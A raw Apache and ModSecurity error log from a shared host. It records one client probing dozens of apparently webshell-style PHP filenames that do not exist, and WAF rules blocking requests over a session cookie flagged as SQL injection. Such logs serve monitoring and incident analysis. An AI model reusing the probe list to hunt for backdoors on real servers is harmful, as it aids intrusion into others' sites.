"agKGbLOxS7i6i_mT2NLaNgAAAEw"]
[Tue May 12 03:46:20.103369 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/temp"] [unique_id "agKGbLOxS7i6i_mT2NLaNgAAAEw"]
[Tue May 12 03:46:20.103571 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGbLOxS7i6i_mT2NLaNgAAAEw"]
[Tue May 12 03:46:20.200339 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/readme.php
[Tue May 12 03:46:20.464275 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/x50.php
[Tue May 12 03:46:20.723051 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/fv.php
[Tue May 12 03:46:20.963438 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/file.php
[Tue May 12 03:46:21.204199 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/lsd.php
[Tue May 12 03:46:21.455367 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/as.php
[Tue May 12 03:46:22.158097 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/wsd.php
[Tue May 12 03:46:22.411789 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/gtc.php
[Tue May 12 03:46:22.676273 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/atx.php
[Tue May 12 03:46:22.729162 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGbno6NvB9WXx5V-6MFgAAAQM"]
[Tue May 12 03:46:22.729390 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGbno6NvB9WXx5V-6MFgAAAQM"]
[Tue May 12 03:46:23.167119 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/z60.php
[Tue May 12 03:46:23.325773 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKGbno6NvB9WXx5V-6MFgAAAQM"]
[Tue May 12 03:46:23.544653 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/v1"] [unique_id "agKGb7OxS7i6i_mT2NLaOQAAAEw"]
[Tue May 12 03:46:23.544852 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/v1"] [unique_id "agKGb7OxS7i6i_mT2NLaOQAAAEw"]
[Tue May 12 03:46:23.545325 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGb7OxS7i6i_mT2NLaOQAAAEw"]
[Tue May 12 03:46:24.036029 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/403.php
[Tue May 12 03:46:24.772016 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/m.php
[Tue May 12 03:46:25.035796 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/themes.php
[Tue May 12 03:46:26.514286 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/click.php
[Tue May 12 03:46:26.799221 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/install.php
[Tue May 12 03:46:27.008237 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGc3o6NvB9WXx5V-6MIgAAAQM"]
[Tue May 12 03:46:27.008475 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGc3o6NvB9WXx5V-6MIgAAAQM"]
[Tue May 12 03:46:27.038691 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/lv.php
[Tue May 12 03:46:27.279571 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/simple.php
[Tue May 12 03:46:27.549476 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/css.php
[Tue May 12 03:46:27.588248 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKGc3o6NvB9WXx5V-6MIgAAAQM"]
[Tue May 12 03:46:27.794196 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/cong.php
[Tue May 12 03:46:28.412911 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/cong.php
[Tue May 12 03:46:28.862126 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/w.php
[Tue May 12 03:46:29.198435 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/404.php
[Tue May 12 03:46:29.581762 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/ioxi-o.php
[Tue May 12 03:46:29.833109 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/0x.php
[Tue May 12 03:46:30.070685 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/css.php
[Tue May 12 03:46:30.314671 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/222.php
[Tue May 12 03:46:30.833628 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/admin.php
[Tue May 12 03:46:31.636273 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/classwithtostring.php
[Tue May 12 03:46:31.907935 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/abcd.php
[Tue May 12 03:46:32.072972 2026] [security2:error] [pid 1709071:tid 1709091] [client 172.104.186.23:42494] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/v2"] [unique_id "agKGeLvMumyrWMfSu7q6zwAAAMQ"]
[Tue May 12 03:46:32.073170 2026] [security2:error] [pid 1709071:tid 1709091] [client 172.104.186.23:42494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/v2"] [unique_id "agKGeLvMumyrWMfSu7q6zwAAAMQ"]
[Tue May 12 03:46:32.073383 2026] [security2:error] [pid 1709071:tid 1709091] [client 172.104.186.23:42494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGeLvMumyrWMfSu7q6zwAAAMQ"]
[Tue May 12 03:46:32.362459 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGeHo6NvB9WXx5V-6MOAAAAQM"]
[Tue May 12 03:46:32.362670 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGeHo6NvB9WXx5V-6MOAAAAQM"]
[Tue May 12 03:46:32.503890 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/autoload_classmap.php
[Tue May 12 03:46:32.924990 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/inputs.php
[Tue May 12 03:46:32.956626 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKGeHo6NvB9WXx5V-6MOAAAAQM"]
[Tue May 12 03:46:33.169129 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/about.php
[Tue May 12 03:46:33.593018 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/alfa.php
[Tue May 12 03:46:34.857101 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/manager.php
[Tue May 12 03:46:34.908637 2026] [security2:error] [pid 1709071:tid 1709091] [client 172.104.186.23:42494] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/archive"] [unique_id "agKGervMumyrWMfSu7q60QAAAMQ"]
[Tue May 12 03:46:34.908847 2026] [security2:error] [pid 1709071:tid 1709091] [client 172.104.186.23:42494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/archive"] [unique_id "agKGervMumyrWMfSu7q60QAAAMQ"]
[Tue May 12 03:46:34.909051 2026] [security2:error] [pid 1709071:tid 1709091] [client 172.104.186.23:42494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGervMumyrWMfSu7q60QAAAMQ"]
[Tue May 12 03:46:35.118219 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/item.php
[Tue May 12 03:46:35.739471 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/404.php
[Tue May 12 03:46:36.155325 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/mail.php
[Tue May 12 03:46:36.871785 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/sx.php
[Tue May 12 03:46:37.420817 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/alfa.php
[Tue May 12 03:46:37.665918 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/1.php
[Tue May 12 03:46:37.909370 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/byp.php
[Tue May 12 03:46:38.483085 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/wp-trackback.php
[Tue May 12 03:46:38.949151 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/.well-known/index.php
[Tue May 12 03:46:39.707722 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/gmo.php
[Tue May 12 03:46:42.824389 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/ww1.php
[Tue May 12 03:46:43.539384 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/.well-known/acme-challenge/index.php
[Tue May 12 03:46:44.049965 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/security.php
[Tue May 12 03:46:46.993266 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/.well-known/admin.php
[Tue May 12 03:46:47.299340 2026] [proxy_fcgi:error] [pid 1730175:tid 1730193] (70008)Partial results are valid but processing is incomplete: [client 195.63.25.134:44708] AH01075: Error dispatching request to : (reading input brigade), referer: https://la-grande-fabrique.com/?p=1
[Tue May 12 03:46:47.997880 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/.well-known/log.php
[Tue May 12 03:46:48.293801 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/class.php
[Tue May 12 03:46:50.058575 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/bless5.php
[Tue May 12 03:46:50.774949 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/lock360.php
[Tue May 12 03:46:51.134936 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/f35.php
[Tue May 12 03:46:51.572633 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/ioxi-o1.php
[Tue May 12 03:46:51.827469 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/juuuu.php
[Tue May 12 03:46:52.236427 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/ha.php
[Tue May 12 03:46:52.486360 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/gg.php
[Tue May 12 03:46:52.925861 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/we2.php
[Tue May 12 03:46:53.420412 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/04.php
[Tue May 12 03:46:53.709752 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/333.php
[Tue May 12 03:46:53.958572 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/520.php
[Tue May 12 03:46:54.323536 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/ar.php
[Tue May 12 03:46:54.729747 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/x.php
[Tue May 12 03:46:54.971334 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/xx.php
[Tue May 12 03:46:55.203888 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/gifclass4.php
[Tue May 12 03:46:55.441747 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/2clas.php
[Tue May 12 03:46:55.673270 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/ave.php
[Tue May 12 03:46:56.025861 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/wrt.php
[Tue May 12 03:46:56.261545 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/bibil.php
[Tue May 12 03:46:56.491239 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/radio.php
[Tue May 12 03:46:56.734706 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/files.php
[Tue May 12 03:46:57.064822 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/file7.php
[Tue May 12 03:46:57.296140 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/gifclass.php
[Tue May 12 03:46:57.923438 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/nox.php
[Tue May 12 03:46:58.262454 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/file48.php
[Tue May 12 03:46:58.582644 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/info.php
[Tue May 12 03:46:58.812273 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/class9.php
[Tue May 12 03:46:59.150097 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/la.php
[Tue May 12 03:46:59.379900 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/bless11.php
[Tue May 12 03:46:59.657681 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/ccou.php
[Tue May 12 03:46:59.887708 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/ton.php
[Tue May 12 03:47:00.116504 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/403.php
[Tue May 12 03:47:00.363364 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/file9.php
[Tue May 12 03:47:00.596158 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/ac.php
[Tue May 12 03:47:01.101441 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/new4.php
[Tue May 12 03:47:01.477661 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/pop.php
[Tue May 12 03:47:01.850809 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/az.php
[Tue May 12 03:47:02.082707 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/xaz.php
[Tue May 12 03:47:02.342525 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/up4.php
[Tue May 12 03:47:02.575300 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/1aa.php
[Tue May 12 03:47:02.876460 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/elp.php
[Tue May 12 03:47:03.113719 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/wtz.php
[Tue May 12 03:47:03.358667 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/galex.php
